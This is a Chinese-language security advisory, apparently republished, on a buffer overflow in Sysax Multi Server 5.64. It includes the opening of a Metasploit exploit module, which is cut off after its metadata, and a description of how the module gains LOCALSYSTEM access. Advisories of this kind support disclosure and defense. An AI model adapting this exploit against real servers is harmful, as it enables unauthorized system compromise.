Sysax Multi Server函数缓冲区溢出漏洞

发布日期:2012-07-29
更新日期:2012-07-31

受影响系统:
sysax Sysax Multi Server 5.64
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 54713

Sysax Multi Server是windows平台下的SSH2和FTP服务器。

Sysax Multi Server 5.64及之前版本在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞以提升的权限执行任意代码。

<*来源:Matt Andreko
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Matt Andreko ()提供了如下测试方法:


require 'msf/core'
require 'base64'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
        super(update_info(info,
            'Name'      => 'Sysax Multi Server 5.64 Create Folder BoF',
            'Description'   => %q{
                    This module exploits a stack buffer overflow in the create folder function
                    in Sysax Multi Server 5.64. This issue was fixed in 5.66.

You must have valid credentials to trigger the vulnerability. Your credentials
                    must also have the create folder permission and the HTTP option has to be enabled.
                    This module will log into the server, get your a SID token and then proceed to exploit
                    the server. Successful exploits result in LOCALSYSTEM access. This exploit works on
                    XP SP3, and Server 2003 SP1-SP2.
            },
            'License'   => MSF_LICENSE,
            'Author'    =>
                [
                    'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64
                    'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50
                ],
            'Version'   => '$Revision:$',
            'References'    =>
                [
                    [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update
                    [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Platform'  => 'win',
            'Payload'   =>
                {
                    'BadChars' => "\x00\x2F",
                },

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wypfpj.html